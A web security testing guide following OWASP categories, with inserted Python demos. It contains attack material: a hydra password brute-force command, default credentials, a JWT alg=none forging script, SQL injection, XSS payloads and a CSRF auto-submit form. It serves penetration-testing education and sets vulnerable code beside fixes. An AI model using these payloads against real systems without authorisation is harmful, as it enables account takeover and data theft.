OWASP Testing Burp Suite DAST Web Security

Web Security Testing

Apr 28, 2022

Web security testing guide based on OWASP methodology, covering key tests for each Top 10 category.

1. Application Recon

whatweb http://target.com
gobuster dir -u http://target.com -w big.txt -x php,html,js
curl http://target.com/robots.txt

2. Authentication Testing

hydra -l admin -P rockyou.txt target.com http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid"
# The last field ("Invalid") is the failure string: copy it from a real failed login,
# otherwise hydra reports false positives. Also check lockout/rate-limit behaviour.
# Default creds: admin:admin | root:root | test:test
# JWT: header and payload are base64url, decode at jwt.io. alg=none attack: set the
# header alg to "none", keep the claims, send an empty signature; a correct verifier
# rejects it, a verifier that trusts the token's alg field accepts it unsigned.
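The alg=none attack worked end to end, as an added example that is not code from the original page: a token is issued with HS256, re-minted with alg=none and an empty signature, and then presented to two verifiers, one that trusts the token's own alg field and one that pins the algorithm server-side. The secret, claims and function names are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed secret and claims for the demo; not from the original page.
SECRET = b"example-hmac-secret"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # Re-add the padding that JWT strips.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def _mac(header_b64: str, payload_b64: str, secret: bytes) -> bytes:
    return hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a properly signed HS256 token, as the application would."""
    header = _segment({"alg": "HS256", "typ": "JWT"})
    payload = _segment(claims)
    return f"{header}.{payload}.{b64url_encode(_mac(header, payload, secret))}"


def forge_alg_none(token: str, overrides: dict) -> str:
    """The attack: reuse the claims, override what we want, declare alg=none,
    and send an empty signature segment (no secret needed)."""
    _, payload_b64, _ = token.split(".")
    claims = json.loads(b64url_decode(payload_b64))
    claims.update(overrides)
    header = _segment({"alg": "none", "typ": "JWT"})
    return f"{header}.{_segment(claims)}."


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Trusts the token's own alg field: an alg=none token is accepted unsigned."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(payload_b64))
    if hmac.compare_digest(_mac(header_b64, payload_b64, secret), b64url_decode(sig_b64)):
        return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Pins the algorithm server-side and always checks the MAC; alg=none is rejected."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(_mac(header_b64, payload_b64, secret), b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    real = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_alg_none(real, {"role": "admin"})
    print("forged token:", forged)
    print("vulnerable verifier:", verify_vulnerable(forged, SECRET))
    print("hardened verifier:", verify_hardened(forged, SECRET))
```

When testing a real target, the forged token has exactly the shape shown here: two base64url segments and a trailing dot. If the application honours it, the finding is a full authentication bypass, not a JWT parsing bug. Variants worth trying are the capitalisations `None`, `NONE` and `nOnE`, which some libraries matched case-insensitively.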

3. Authorisation / IDOR

GET /api/users/1/profile  → change to /api/users/2/profile
GET /download?file=invoice_001.pdf → invoice_002.pdf

4. SQL Injection

'              # SQL syntax error in the response = input reaches the query unescaped
' OR '1'='1   # Bypasses the WHERE filter and returns all records
sqlmap -u "http://target.com/search?q=1" --dbs
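The two manual probes above, run against a vulnerable query and its parameterised fix, as an added example that is not part of the original page. It uses an in-memory SQLite table constructed for the demo; the point generalises to any database driver that supports bound parameters.

```python
import sqlite3

# Constructed sample data: one row is meant to be hidden from the search.
ROWS = [("widget", 1), ("gadget", 1), ("secret-prototype", 0)]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany("INSERT INTO products (name, public) VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def search_vulnerable(conn: sqlite3.Connection, q: str) -> list:
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = "SELECT name FROM products WHERE public = 1 AND name = '" + q + "'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, q: str) -> list:
    """Bound parameter: the input is data only and cannot change the query."""
    sql = "SELECT name FROM products WHERE public = 1 AND name = ?"
    return [row[0] for row in conn.execute(sql, (q,))]


def probe(conn: sqlite3.Connection, q: str) -> str:
    """The page's first test: a lone quote that produces a SQL error is the tell."""
    try:
        search_vulnerable(conn, q)
        return "no error"
    except sqlite3.OperationalError as exc:
        return f"sql error: {exc}"


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "'"))
    # ' OR '1'='1 turns the WHERE clause into (public = 1 AND name = '') OR '1'='1',
    # so the non-public row leaks through the vulnerable query.
    print(search_vulnerable(db, "' OR '1'='1"))
    print(search_safe(db, "' OR '1'='1"))
```

Note that the injected condition is appended with OR, which binds more loosely than the existing AND: that is why the `public = 1` restriction is defeated rather than merely extended, and why a payload that returns more rows than expected is a stronger signal than the error alone.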

5. XSS

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

6. CSRF

<!-- Succeeds only if the browser attaches the victim's session cookie to the cross-site
     POST: no anti-CSRF token checked, and the cookie not marked SameSite=Lax/Strict. -->
<form action="http://target.com/change-email" method="POST">
  <input name="email" value="attacker@evil.com">
</form>
<script>document.forms[0].submit()</script>

7. Security Headers

curl -I https://target.com
# Check: Strict-Transport-Security, X-Content-Type-Options,
# X-Frame-Options, Content-Security-Policy
# Verify at: https://securityheaders.com/
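A small checker for the `curl -I` output, as an added example that is not code from the original page. It parses a raw response header block and reports each of the four headers listed above as missing, weak or ok; the weak checks (HSTS max-age under one year, X-Content-Type-Options not equal to nosniff) and the sample responses are constructed for the demo.

```python
import re

# One year, the usual minimum recommended for HSTS max-age (assumption for the demo).
MIN_HSTS_AGE = 31536000

REQUIRED = [
    "strict-transport-security",
    "x-content-type-options",
    "x-frame-options",        # a CSP frame-ancestors directive supersedes this header
    "content-security-policy",
]

# Constructed responses, not captured from any real host.
WEAK_RESPONSE = """HTTP/2 200
content-type: text/html
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=300
"""

GOOD_RESPONSE = """HTTP/2 200
content-type: text/html
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
x-frame-options: DENY
content-security-policy: default-src 'self'
"""


def parse_headers(raw: str) -> dict:
    """Turn a `curl -I` style header block into a lower-cased name -> value dict."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def check_headers(raw: str) -> dict:
    """Return a finding ('missing', 'weak: ...' or 'ok') per required header."""
    headers = parse_headers(raw)
    findings = {}
    for name in REQUIRED:
        value = headers.get(name)
        if value is None:
            findings[name] = "missing"
            continue
        problem = None
        if name == "strict-transport-security":
            match = re.search(r"max-age=(\d+)", value, re.IGNORECASE)
            if match is None or int(match.group(1)) < MIN_HSTS_AGE:
                problem = "max-age below one year"
        elif name == "x-content-type-options" and value.lower() != "nosniff":
            problem = "value is not nosniff"
        findings[name] = "ok" if problem is None else f"weak: {problem}"
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("good", GOOD_RESPONSE)):
        print(label, check_headers(raw))
```

To use it on a live target, pipe `curl -sI https://target.com` into `check_headers`. Remember that `-I` sends a HEAD request; some servers set different headers on GET, so confirm on the real page as well.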

8. SSL/TLS

nmap --script ssl-enum-ciphers -p 443 target.com
# Verify: TLS 1.2/1.3 enabled | TLS 1.0/1.1/SSL disabled
# Check at: https://www.ssllabs.com/ssltest/